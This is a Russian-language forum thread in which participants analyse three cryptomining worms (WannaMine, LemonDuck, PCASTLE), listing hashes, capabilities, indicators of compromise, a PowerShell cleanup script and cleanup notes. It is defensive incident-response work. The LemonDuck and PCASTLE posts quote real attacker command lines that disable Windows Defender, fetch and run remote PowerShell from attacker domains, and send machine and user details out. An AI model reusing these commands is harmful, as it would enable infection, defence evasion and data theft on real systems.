    Как мы увидим в ходе анализа, эта вредоносная программа состоит из нескольких компонент и имеет возможность извлекать учетные данные из уязвимых систем, используя Mimikatz, а также для эксплуатации уязвимости CVE-2017-01441, известной как EternalBlue. чтобы получить доступ к другим машинам в сети, где вы не можете сделать это с помощью учетных данных, полученных с помощью собственных механизмов удаленного выполнения в Windows. Атака частично безфайловая, чтобы обойти антивирус и программы сканирования, автоматизированный запуск в песочницах, так как используется через PowerShell, чтобы попытаться запустить все в объем памяти.

    .1. Общая информация
    В ходе анализа этой угрозы были извлечены различные артефакты, которые обобщены. следующий:

    4.1.1. int6.ps1
    Дроппер, который осуществляет первоначальное заражение на каждой из пораженных машин. Это стартовый файл для этого анализа:
    Int6.ps1 MD5 3b8e4705bbc806b8e5962efe39a35f66
    SHA1 601daafe2b7725a46520580fa18d0c1103af00f2
    SHA256 88b7f7517d70ae282a17bff20382599566cc4ff14492f18158fd4a9285ef89ff

    4.1.2. "Funs" Этот артефакт представляет собой сценарий PowerShell, который содержит множество вспомогательных функций, и функциональность бокового движения. Многие функции поступают из фреймворков, как Empire.
    "Funs" MD5 b2de128c2f70dc74cc25680bc6ac9a94
    SHA1 9739ff09665d32dd09a73c25fdbb3e4538ab26a0
    SHA256 e27b534c2d296ce0e987bf3d0a0bb13a9d252c81b5ae7557e36368ba560c6f4f

    4.1.3. «mimi»: Mimikatz Это двоичный файл Mimikatz, который выполняется путем отраженной инъекции, избегая таким образом, он записывается на диск и используется для получения учетных данных системы.
    «mini» MD5 0367064d9585cc5c8b8eff127d9565d0
    SHA1 784720bab9106e47c5b34d7f0fa12d1388fe1f9d
    SHA256 d82889279c771f362f870a5f896fc435790cbd0b587e86efcd4164570ce12a72

    4.1.4. «mon»: miner XMRig Это двоичный файл программного обеспечения XMRig3, майнера криптовалюты с открытым исходным кодом. популярны в атаках криптоджекинга.
    Он работает в памяти с помощью PowerShell, поэтому что двоичный файл не записывается на диск.
    "mon":
    MD5 91ff884cff84cb44fb259f5caa30e066
    SHA1 c68e4d9bc773cfef0c84c4a33d94f8217b12cb8b
    SHA256 5a0ec41eb3f2473463b869c637aa93fac7d97faf0a8169bd828de07588bd2967

    4.1.5. WinRing0x64.sys Этот артефакт является законным и подписанным драйвером, используемым майнером XMRig, который позволяет Это настроит регистры MSR5,6 для оптимизации производительности майнинга. Известно, что этот драйвер содержит уязвимости, которые позволяют эскалацию привилегии, хотя это не его роль во время атаки WannaMine.

    WinRing0x64.sys
    MD5 0c0195c48b6b8582fa6f6373032118da
    SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
    SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

    4.1.6. mue.exe
    Этот артефакт записывается на диск во время заражения, и его задача - инжектировать полезную нагрузку в легальный процесс.
    Mue.exe
    MD5 d1aed5a1726d278d521d320d082c3e1e
    SHA1 efdb3916c2a21f75f1ad53b6c0ccdf90fde52e44 SHA256 0a1cdc92bbb77c897723f21a376213480fd3484e45bda05aa5958e84a7c2edff

    4.2. Эта угроза способна выполнять следующие действия:
    * Обойти интерфейс сканирования на наличие вредоносных программ (AMSI).
    * Поддерживать устойчивость в системе, создав подписку на события WMI.
    * Извлекать токены NTLM.
    * Сканировать на наличие уязвимости EternalBlue.
    * Распространение на другие системы с помощью EternalBlue.
    * Распространение на другие системы путем удаленного выполнения WMI с функцией Pass-the-Hash.
    * Распространение на другие системы путем удаленного выполнения SMB с помощью функции Pass-the-Hash.
    * Установить программное обеспечение для добычи криптовалюты безфайловым исполнением (PowerShell).
    * Установить программное обеспечение для майнинга криптовалют путем инъекции (Process Hollowing)
    * Изменить настройки Windows, чтобы оптимизировать производительность майнинга.
    * Изменить настройки Windows для сохранения.
    * Оставить систему в уязвимом состоянии для локального повышения привилегий

    Очистка системы
    Чтобы удалить этот конкретный WannaMine из зараженной системы, вы можете запустить следуя сценарию PowerShell с правами администратора, и перезагрузите компьютер, когда закончите.
    Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding -
    Filter “__Path LIKE '%SCM Event8 Log Consumer%'’' | Remove-WmiObject
    Get-WMIObject -Namespace root\subscription -Class __EventFilter -filter “Name LIKE
    '%SCM Event8 Log Filter%'’' |Remove-WmiObject
    Get-WMIObject -Namespace root\subscription -Class CommandLineEventConsumer -
    Filter ('Name like '%SCM Event8 Log Consumer%'') | Remove-WmiObject
    Get-WMIObject -Namespace root\default -List | where {$_.Name –eq
    'systemcore_Updater8'} | Remove-WmiObject
    sc.exe stop WinRing0_1_2_0
    sc.exe delete WinRing0_1_2_0
    if
    ([System.IO.File]::Exists([environment]::SystemDirectory+‘\WindowsPowerShell\v1.0\Wi
    nRing0x64.sys’)) {
    echo (‘Borrando
    ‘+[environment]::SystemDirectory+‘+‘\WindowsPowerShell\v1.0\WinRing0x64.sys’) ;
    rm ([environment]::SystemDirectory\WindowsPowerShell\v1.0\WinRing0x64.sys)
    }
    if ([System.IO.File]::Exists([environment]::SystemDirectory+‘\drivers\WinRing0x64.sys’))
    {
    echo (‘Borrando ‘+[environment]::SystemDirectory+‘+‘\drivers\WinRing0x64.sys’) ;
    rm ([environment]::SystemDirectory\drivers\WinRing0x64.sys)
    }
    if ([System.IO.File]::Exists([environment]::SystemDirectory+‘\mui.exe’)) {
    echo (‘Borrando ‘+[environment]::SystemDirectory+‘\mui.exe’) ;
    rm ([environment]::SystemDirectory\mue.exe)
    } if ([System.IO.File] :: Exists ($ env: WINDIR + ‘\ temp \ sysupdater0.bat’)) { echo «Borrando $ env: WINDIR \ temp \ sysupdater0.bat»; rm $ env: WINDIR \ temp \ sysupdater0.bat } if ([System.IO.File] :: Exists ($ env: WINDIR + ’\ 11.vbs’)) { echo «Borrando $ env: WINDIR \ 11.vbs»; rm $ env: WINDIR \ 11.vbs } if ([System.IO.File] :: Exists ($ env: WINDIR + ’\ info.vbs’)) { echo «Borrando $ env: WINDIR \ info.vbs»; rm $ env: WINDIR \ info.vbs } schtasks / DELETE / TN sysupdater0 / F 
    

    Хотя скрипт удаляет следы вредоносных программ из системы, рекомендуется продолжить изучение.

    детальный анализ данного варианта так же есть здесь:
    https://www.certego.net/en/news/handling-a-destributed-cryptominer-ad-worm/
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
  • отредактировано September 2021 PM
    Крипто-майнер LemonDuck

    LemonDuck является одним из семейства вредоносных ПО для майнинга криптовалют

    С момента своего первого появление в октябре 2019 года, вредоносная программа расширила свои возможности новым механизмом сохранения через WMI и новый боковой стратегией движения.

    Некоторые из наиболее впечатляющих техник включают:
    • Различные способы первоначального доступа (фишинговые письма, EternalBlue, RDP, SSH, учетные записи SQL)
    • Безфайловое исполнение на всем протяжении до финальной полезной нагрузки
    • Постоянство через WMI и запланированные задачи
    • Боковое движение с помощью специального модуля и различные техники
    • Использование общедоступных инструментов для достижения целей (XMRig, PingCastle, PowerSploit)


    Первоначальный доступ

    Заражение системы во многом зависит от способности вредоносных скриптов к боковому перемещению. LemonDuck расширил исходную идею Kingminer для подбора учетных записей SQL Server и добавил больше возможностей для использования техник в свой арсенал. Заражение может начаться в системе несколькими способами:
    ● фишинговое письмо - отправлено с уже зараженной машины.
    ● EternalBlue или другие эксплойты для SMB.
    ● Брутфорс RDP - если в системе есть слабые учетные записи.
    ● Файл .lnk со съемного или сетевого диска.
    ● Брутфорс SSH - если в системе есть слабые учетные записи.
    ● Pass-the-hash - если злоумышленникам удастся сбросить действительный хэш пароля NTLM.
    ● Брутфорс MS-SQL - аналогично Kingminer, если есть слабые учетные данные БД.
    ● Удаленная команда Redis.
    ● Удаленное управление Yarn.

    Первым шагом, когда злоумышленники закрепляются на машине, является загрузка и выполнение сценария PowerShell из C2 сервер.

    Существует два способа выполнения командной строки загрузчика в системе. Первый - это прямой способ вызов командной строки. Второй содержит дополнительный шаг в попытке остаться незамеченным путем регистрации пользовательского процесса CompMgmtLauncher.exe или ComputerDefaults.exe. Эта командная строка только используется один раз при запуске скрипта. После запуска одного из выбранных процессов скрипт удаляет ключ реестра, содержащие вредоносную командную строку:
    cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference
    -ExclusionPath c:\;Add-MpPreference -ExclusionProcess c:\windows\system32\
    WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden Iex(new-object net.
    webclient).downloadstring(‘http://t[.]amynx[.]com/ipc[.]jsp?0.8?Ion Testalescu*DESKTOPD65O5JE*10’)
    

    Этот URL-адрес загрузки также сообщает злоумышленнику о заражении новой системы и содержит имя пользователя и имя машины в параметрах.

    Далее скрипт подготавливает среду для выполнения следующих этапов и финальных полезных нагрузок. Во-первых, он удаляет все существующие AV из системы с помощью WMI. Затем для каждого доступного домена в переменной $ us регистрируется запланированная задача и получатель событий WMI с той же командой (хранится в $ tmps). Скрипт также помечает зараженные системы значком пустая запланированная задача с именем blackball и добавляет свой механизм сохранения, только если эта задача отсутствует. Наконец, сценарий подготавливает среду к боковому перемещению, добавляя правила брандмауэра для различных портов. Интересным действием на этом этапе является отказ в доступе к портам 445 и 135 на зараженных машинах.

    Устойчивость

    LemonDuck использует два метода для поддержания устойчивости. Злоумышленники позаботились с запасом; у них есть три домена (t.zz3r0[.]com, t.zer9g[.]com, t.amynx[.]com), где они разместили скрипты второго этапа. Таким образом, они регистрируют три команды с запланированными задачами и те же три команды с событием WMI и потребителями. Команды загружают и выполняют один и тот же сценарий. Запланированные задачи и потребители событий WMI удобны, когда дело доходит до безфайловых атак. Пример cmdline для периодического запуска:
    “powershell” -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).”DownloadData”($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.
    RSAParameters;$p.Modulus=[convert]::FromBase64String(‘2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef-
    4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=’);$p.Exponent=0x01,0x-
    00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$u
    rl=’http://’+’t.zz3’+’r0[.]com’;a($url+’/a.jsp?_20200807?’+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join’*’))
    

    Вторая стадия.

    Командные строки, зарегистрированные на этапе устойчивости, скачивают и запускают скрипт второго этапа атаки. Второй этап начинается либо с svchost.exe процесс (для запланированных задач) или процесс scrcons.exe (для потребителей событий). Загруженный скрипт запутывается при загрузке в память, затем деобфускируется при запуске.

    После деобфускации скрипт становится читаемым и состоит из трех отдельных частей.

    Первая часть подготавливает среды для выполнения путем остановки уже запущенных полезных нагрузок и отключения Защитника Windows, и он собирает информация о системе, такая как имя компьютера, домен, версия ОС, текущие права пользователя и т. д.

    Вторая часть загружает и запускает двоичные файлы m6.bin, m6g.bin, kr.bin, if.bin и nvd.zip с диска. Для этого он определяет некоторые вспомогательные функции и создает мьютексы, поэтому полезные данные запускаются только один раз за сеанс.

    Третья часть - это загрузчик и исполнитель, который проверяет загруженные полезные данные с помощью функции SIEX и запускает их в памяти.

    Полезные данные загружаются в память

    Первый вызов SIEX отправляет собранную информацию злоумышленнику в виде параметров в URL-адресе. цель - уведомить злоумышленников об успешном заражении.

    Второй вызов SIEX вызывает сценарий из домена злоумышленника в if_mail.bin.

    Цель этого сценария powershell - отправить фишинговые сообщения электронной почты контактам Outlook текущего пользователя. Это порождает Файлы .rtf и .js в виде вложений, которые запустят вредоносный код на машине жертвы, если фишинг будет успешным.

    Третий вызов SIEX получает сценарий Powershell, который загружает и выполняет новую полезную нагрузку. После загрузки в \ AppData \ Local \ Temp \, сценарий проверяет, соответствует ли MD5 файла жестко запрограммированному значению и создает задачу

    If.bin - это большой файл размером 270 КБ, содержащий заархивированный сценарий Powershell. После деобфускации этот скрипт раскрывается как большой набор инструментов для эксплуатации / тестирования на проникновение или безопасности. инструменты аудита, в основном взятые из общедоступных источников и используемые для бокового смещения.

    • Эксплуатация EternalBlue - использование сканера портов PingCastle [4] для обнаружения машин, отвечающих на порт 445 и затем запуск эксплуатации SMB

    • RDB brute-forcing module

    • USBLNK - способен заражать сетевые диски и съемные диски с файловыми системами FAT32 и NTFS. Создает .lnk файлы на этих дисках для выполнения кода.

    •PowerDump [5] and Mimikatz to dump NTLM passwords, used in pass the hash attacks
    #######################################powerdump written by David
    Kennedy#########################################

    • MS-SQL brute-forcing - scans IPs for ports 1433 and attempts to brute-force accounts, similar to Kingminer
    write-host “start mssql port open scanning...”


    •SSH brute-forcing
    write-host “start ssh port open scanning...”

    • Redis (Remote Dictionary Server) command execution - scans for ports 6379 and 16379 and then attempt to execute remote commands

    • Yarn command execution - scans for port 8088 and attempts to execute remote commands

    m6.bin он же. XMRig

    Это версия XMRig, без информации о версии, но все же узнаваемая в IDA по заголовку окна и конфигурации json.

    m6g.bin он же. XMRig Модуль PowerSploit [6] загружает двоичный блок данных, содержащийся в том же файле.

    kr.bin aka. Kill Competition

    Этот файл представляет собой сценарий PowerShell, который выполняет роль освобождения ресурсов в системе, останавливая фоновый режим, ненужные сервисы, и убивает конкурирующие майнерские процессы.

    Заключение

    Злоумышленники, стоящие за LemonDuck, усовершенствовали идеи, лежащие в основе KingMiner, и создали вредоносное ПО, которое может заразить много больше систем и гораздо эффективнее майнить криптовалюту.

    https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf
    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
  • отредактировано January 2022 PM
    Worm-Cryptominer-PCASTLE

    В одной из задач по очистке заражений в локальной сети столкнулись с периодическим запуском в системе powershell, и детектированием вредоносного действия установленным антивирусом. однако в логи антивируса указывается только powershell.exe и целевой адрес. Поскольку процессы запуска системе были кратковременными в образ автозапуска данное событие было зафиксировано лишь через отслеживание процессов и задач без учета цели и cmdline.
    Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
    Имя файла POWERSHELL.EXE
    Цифр. подпись Действительна, подписано Microsoft Windows
    Оригинальное имя PowerShell.EXE.MUI
    Версия файла 6.3.9600.17396 (winblue_r4.141007-2030)
    Описание Windows PowerShell
    Производитель Microsoft Corporation

    Доп. информация на момент обновления списка
    pid = 5100 NT AUTHORITY\СИСТЕМА
    Процесс создан 08:20:00 [2021.09.14]
    Процесс завершен 08:20:01 [2021.09.14]
    parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE
    pid = 4724 NT AUTHORITY\СИСТЕМА
    Процесс создан 08:20:00 [2021.09.14]
    Процесс завершен 08:20:00 [2021.09.14]
    parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE
    pid = 5496 NT AUTHORITY\СИСТЕМА
    Процесс создан 08:10:00 [2021.09.14]
    Процесс завершен 08:10:01 [2021.09.14]
    parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE

    после включение записи лога DNS стали известны целевые адреса:
    T[.]ZER2[.]COM, V[.]Y6H[.]NET

    далее, разработчик uVS добавил функцию обнаружения cmdline по закрытым процессам и картина атаки резко прояснилась - было зафиксировано через powershell два варианта запуска:
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -c "IEX(New-Object System.Net.WebClient).DownloadString(\"http://t[.]zer2[.]com/ipc.jsp?h\")"
    
    и
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdwBtAD8AcwBtAGIAJwApAA==
    

    2rl2adkha8u7.jpg

    после декодирования строки:
    IEX (New-Object Net.WebClient).downloadstring('http://v[.]beahh[.]com/wm?smb')
    
    собственно, именно данный целевой адрес и детектировал антивирус:
    10.09.2021 12:00:04 http[:]//v[.]beahh[.]com/wm?smb Blocked by internal blacklist C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe NT AUTHORITY\СИСТЕМА 72.52.178.23 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B

    родительский процесс (здесь 432) для процессов запуска powershell с указанным cmdline

    psquwezo61py.jpg

    поиск по известному cmdline позволил определить тип (Trojan.PS1.PCASTLE) и дополнительные детали вредоносного ПО, который распространился в сети:
    The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

    \\\Rtsa - powershell -nop -ep bypass -e {Base64 Encoded String}
    \\\Rtsa - powershell -nop -ep bypass -c ''IEX(New-Object System.Net.WebClient).DownloadString(\\\"http[:]//t[.]zer2[.]com/ipc.jsp?h\\\")''
    и
    "More advanced options" option to include all hidden files and folders in the search result.

    %Application Data%\sign.txt
    %Application Data%\flashplayer.tmp
    %User Startup%\run.bat
    %User Startup%\FlashPlayer.lnk

    данные файлы были найдены в карантине антивируса:
    7F450F8583BA949317E8FA47E1B745CEC6CE242E.NDF "C:\Users\***\AppData\Roaming\flashplayer.tmp";"C:\Users\****\AppData\Roaming\flashplayer.tmp" "@NAME=PowerShell/TrojanDownloader.Agent.DV@TYPE=Trojan@SUSP=inf" ****** 221 bytes

    896C398162D9175E7B6736DE39710ED8385C9DC2.NDF "c:\users\***\appdata\roaming\microsoft\windows\start menu\programs\startup\flashplayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk" "@NAME=LNK/Agent.GY@TYPE=Trojan@SUSP=inf" 774 bytes

    A33C1553998CCC0B1FF1F2A91BBB1A53B686AC13.NDF "C:\Windows\System32\Tasks\Rtsa" "@NAME=PowerShell/TrojanDownloader.Agent.CEJ@TYPE=Trojan@SUSP=inf" **** 2066 bytes

    детальное описание червя-майнера c использованием экспойтов АНБ PS1.PCASTLE от BitDefender здесь
    https://www.bitdefender.com/files/News/CaseStudies/study/280/Bitdefender-WhitePaper-Worm-Cryptominer-Beapy-PCASTLE.pdf

    некоторые детали:
    URLs used by updated worms for infection

    http[:]//w.beahh.com/page.html
    http[:]//v.beahh.com/

    PowerShell URLs:
    Note that these are URL fragments, and more information is usually encoded in the query string.

    http[:]//v.y6h.net/g
    http[:]//v.bddp.net/v
    http[:]//v.bddp.net/wm

    Domains
    Some domains have many subdomains.
    For this reason, we will use a wildcard in place of the subdomain, as the entire domain is attacker-controlled.

    *.beahh[.]com
    *.bddp[.]net
    v.y6h[.]net
    *.zer2[.]com
    Scheduled task names:
    \Microsoft\Windows\
    Task: {36DAD069-B5EB-4EE4-A085-CB9540ED7B30} - \Microsoft\windows\Rass -> Нет файла <==== ВНИМАНИЕ

    Filenames:
    %APPDATA%\sign.txt
    %APPDATA%\flashplayer.tmp
    %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk

    Listening ports:
    65530
    65531
    65532
    65533

    TCP traffic on ports:
    This will appear as open port checks (TCP SYN packet, followed either by a TCP RST from the target machine, or a 3-way handshake followed by a graceful shutdown)
    65530
    65531
    65532
    65533

    Firewall rules:
    DNS (allow TCP port 65531)
    DNSS2 (allow TCP port 65531)
    DNS2 (allow TCP port 65532)
    DNSsql (allow TCP port 65533)
    DNSd (allow TCP port 65533)
    DNSS3 (allow TCP port 65533)

    User accountsWindows user account: “k8h3d”, password “k8d3j9SjfS7”
    SQL Server account: “sa”, password “ksa8hd4,m@~#$%^&*()”(Note: “sa” is a legitimate account, but the password above is not.)

    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
Войдите или Зарегистрируйтесь чтобы комментировать.